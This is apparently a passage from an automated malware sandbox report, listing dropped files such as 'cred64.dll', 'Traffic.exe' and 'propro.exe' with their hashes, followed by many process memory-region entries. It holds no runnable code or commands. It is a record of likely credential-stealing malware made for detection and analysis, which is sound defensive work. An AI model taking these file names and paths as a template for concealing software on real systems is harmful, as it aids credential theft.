                                                                                                          12fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46

                                                                                                          SHA512

                                                                                                          9ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e

                                                                                                        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
                                                                                                          Filesize

                                                                                                          1.2MB

                                                                                                          MD5

                                                                                                          15a42d3e4579da615a384c717ab2109b

                                                                                                          SHA1

                                                                                                          22aeedeb2307b1370cdab70d6a6b6d2c13ad2301

                                                                                                          SHA256

                                                                                                          3c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103

                                                                                                          SHA512

                                                                                                          1eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444

                                                                                                        • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
                                                                                                          Filesize

                                                                                                          541KB

                                                                                                          MD5

                                                                                                          1fc4b9014855e9238a361046cfbf6d66

                                                                                                          SHA1

                                                                                                          c17f18c8246026c9979ab595392a14fe65cc5e9f

                                                                                                          SHA256

                                                                                                          f38c27ecbeed9721f0885d3b2f2f767d60a5d1c0a5c98433357f570987da3e50

                                                                                                          SHA512

                                                                                                          2af234cac24ec4a508693d9affa7f759d4b29bb3c9ddffd9e6350959fd4da26501553399d2b02a8eeae8dace6bfe9b2ce50462ce3c6547497f5b0ea6ed226b12

                                                                                                        • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                                                                                                          Filesize

                                                                                                          304KB

                                                                                                          MD5

                                                                                                          cc90e3326d7b20a33f8037b9aab238e4

                                                                                                          SHA1

                                                                                                          236d173a6ac462d85de4e866439634db3b9eeba3

                                                                                                          SHA256

                                                                                                          bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7

                                                                                                          SHA512

                                                                                                          b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521

                                                                                                        • C:\Users\Admin\Desktop\Microsoft Edge.lnk
                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          8ce12f72e092d6b856a8f7b4ed4b89bb

                                                                                                          SHA1

                                                                                                          9a9ec6877e0201356eda43bea1cb0ce5263ba7ca

                                                                                                          SHA256

                                                                                                          ddc6caafc71d42b3de2d7e39a902d6561af6d0e9deb33d1e0ac43be2803cf117

                                                                                                          SHA512

                                                                                                          1dc7d62b3535093a20f8f27f11d9d4ef10498da780a95ce91547aac2704f12b44a8be8cec7fa2417f778f0e06699b9c58ed639faa10c187a010fa9410dc1dfcb

                                                                                                        • C:\Users\Public\Desktop\Google Chrome.lnk
                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          4638e4d5380391c8012ef3448ccdf1d0

                                                                                                          SHA1

                                                                                                          1f42302d0ace00e0f06d26b29e72f0e418f60d72

                                                                                                          SHA256

                                                                                                          d184a7f6075fa5bb566e85f5055302755097965d53b51444bf2fa4def43d7f6a

                                                                                                          SHA512

                                                                                                          59b5c786a86bf648e4a84a7b8fac9f472513d987edeaae856b611f47f787b89c6e0879826215aa01b19713ef93a12cea9768c08e0336a9cfce2afc4aca25d2bd

                                                                                                        • \??\pipe\LOCAL\crashpad_5984_PIUUPODJRMQZOUPE
                                                                                                          MD5

                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                          SHA1

                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                          SHA256

                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                          SHA512

                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                        • memory/240-151-0x0000000000BF0000-0x0000000000C7C000-memory.dmp
                                                                                                          Filesize

                                                                                                          560KB

                                                                                                        • memory/240-154-0x00007FF8E40A0000-0x00007FF8E4B62000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/240-173-0x000000001B820000-0x000000001B830000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/1032-433-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-409-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-430-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-441-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-443-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-446-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-440-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-439-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-429-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-427-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-417-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-415-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-413-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-412-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-411-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-410-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-408-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-401-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-398-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-387-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-384-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-385-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-383-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-382-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-380-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-378-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-377-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-375-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-376-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-370-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1032-354-0x0000000000400000-0x00000000007BF000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1060-48-0x0000000000780000-0x0000000000B3F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1060-136-0x0000000000780000-0x0000000000B3F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1060-171-0x0000000000780000-0x0000000000B3F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1060-372-0x0000000000780000-0x0000000000B3F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1060-521-0x0000000000780000-0x0000000000B3F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1060-47-0x0000000000780000-0x0000000000B3F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/1320-204-0x0000000072CF0000-0x00000000734A1000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/1320-205-0x00000000006F0000-0x0000000000740000-memory.dmp
                                                                                                          Filesize

                                                                                                          320KB

                                                                                                        • memory/1320-206-0x0000000005360000-0x0000000005370000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/1584-10-0x0000000004E40000-0x0000000004E41000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-9-0x0000000004E10000-0x0000000004E11000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-8-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-6-0x0000000004E20000-0x0000000004E21000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-1-0x00000000775F6000-0x00000000775F8000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1584-3-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-0-0x0000000000E00000-0x00000000012D8000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1584-7-0x0000000004DB0000-0x0000000004DB1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-16-0x0000000000E00000-0x00000000012D8000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1584-11-0x0000000004E30000-0x0000000004E31000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-2-0x0000000000E00000-0x00000000012D8000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1584-4-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1584-5-0x0000000004DD0000-0x0000000004DD1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1860-26-0x00000000052C0000-0x00000000052C1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1860-19-0x00000000007C0000-0x0000000000C98000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1860-556-0x00000000007C0000-0x0000000000C98000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1860-23-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1860-24-0x0000000005240000-0x0000000005241000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1860-70-0x00000000007C0000-0x0000000000C98000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1860-25-0x0000000005250000-0x0000000005251000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1860-22-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1860-111-0x00000000007C0000-0x0000000000C98000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1860-447-0x00000000007C0000-0x0000000000C98000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1860-20-0x00000000007C0000-0x0000000000C98000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1860-27-0x00000000052B0000-0x00000000052B1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/1860-226-0x00000000007C0000-0x0000000000C98000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/1860-21-0x0000000005270000-0x0000000005271000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-175-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-210-0x0000000000A00000-0x0000000000ECF000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/2952-163-0x0000000004B40000-0x0000000004B41000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-159-0x0000000004B80000-0x0000000004B81000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-161-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-166-0x0000000004B50000-0x0000000004B51000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-157-0x0000000000A00000-0x0000000000ECF000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/2952-167-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-158-0x0000000004B70000-0x0000000004B71000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-169-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2952-122-0x0000000000A00000-0x0000000000ECF000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/2952-160-0x0000000004B60000-0x0000000004B61000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/3552-212-0x0000000002940000-0x0000000004940000-memory.dmp
                                                                                                          Filesize

                                                                                                          32.0MB

                                                                                                        • memory/3552-80-0x0000000002940000-0x0000000004940000-memory.dmp
                                                                                                          Filesize

                                                                                                          32.0MB

                                                                                                        • memory/3552-68-0x0000000000270000-0x000000000042C000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.7MB

                                                                                                        • memory/3552-79-0x0000000072CF0000-0x00000000734A1000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/3552-71-0x0000000004EC0000-0x0000000004ED0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/3552-69-0x0000000072CF0000-0x00000000734A1000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/4432-168-0x0000000006BE0000-0x00000000071F8000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.1MB

                                                                                                        • memory/4432-172-0x0000000006730000-0x000000000683A000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.0MB

                                                                                                        • memory/4432-156-0x0000000005BE0000-0x0000000005C56000-memory.dmp
                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/4432-125-0x0000000005040000-0x000000000504A000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/4432-177-0x0000000006840000-0x000000000688C000-memory.dmp
                                                                                                          Filesize

                                                                                                          304KB

                                                                                                        • memory/4432-113-0x0000000000660000-0x00000000006B2000-memory.dmp
                                                                                                          Filesize

                                                                                                          328KB

                                                                                                        • memory/4432-162-0x0000000006360000-0x000000000637E000-memory.dmp
                                                                                                          Filesize

                                                                                                          120KB

                                                                                                        • memory/4432-112-0x0000000072CF0000-0x00000000734A1000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/4432-121-0x00000000055B0000-0x0000000005B56000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.6MB

                                                                                                        • memory/4432-124-0x0000000005260000-0x0000000005270000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4432-174-0x0000000006670000-0x0000000006682000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/4432-176-0x00000000066D0000-0x000000000670C000-memory.dmp
                                                                                                          Filesize

                                                                                                          240KB

                                                                                                        • memory/4432-123-0x00000000050A0000-0x0000000005132000-memory.dmp
                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/4548-74-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.6MB

                                                                                                        • memory/4548-82-0x0000000072CF0000-0x00000000734A1000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/4548-81-0x0000000005760000-0x0000000005770000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4560-351-0x0000000000400000-0x0000000000450000-memory.dmp
                                                                                                          Filesize

                                                                                                          320KB

                                                                                                        • memory/4616-585-0x0000000000E70000-0x000000000122F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/4616-450-0x0000000000E70000-0x000000000122F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.7MB

                                                                                                        • memory/5020-211-0x0000000000D70000-0x000000000123F000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/5020-538-0x0000000000D70000-0x000000000123F000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/5020-381-0x0000000000D70000-0x000000000123F000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/6032-605-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-610-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-615-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-622-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-588-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-608-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-584-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-582-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6032-602-0x0000000004C50000-0x0000000004E8B000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.2MB

                                                                                                        • memory/6040-597-0x0000000000DD0000-0x0000000001290000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB